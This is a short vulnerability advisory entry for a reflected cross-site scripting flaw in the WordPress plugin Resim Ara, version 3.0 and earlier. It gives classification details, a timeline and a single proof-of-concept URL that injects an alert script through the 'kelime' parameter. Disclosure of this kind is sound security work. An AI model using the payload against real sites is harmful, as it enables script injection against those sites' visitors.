Resim Ara <= 3.0 - Unauthenticated Reflected XSS
Description
The WordPress plugin team was notified on January 17th, 2020.

Note: There were inconsistencies between the versions from the readme.txt (3.0), the plugin file (1.0) as well as tags (1.0 to 3.0).
Proof of Concept
http://www.example.com/wp-content/plugins/resim-ara/y.php?&kelime=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%

Affects Plugin

Fixed in: no known fix (plugin closed)

References

PACKETSTORM 155980

Classification

Type: XSS
OWASP Top 10: A7: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Original Researcher: Ricardo Sanchez
Views: 3053
Verified: No
WPVDB ID: 10030

Timeline

Publicly Published: 2020-01-16
Added: 2020-01-17
Last Updated: 2020-02-13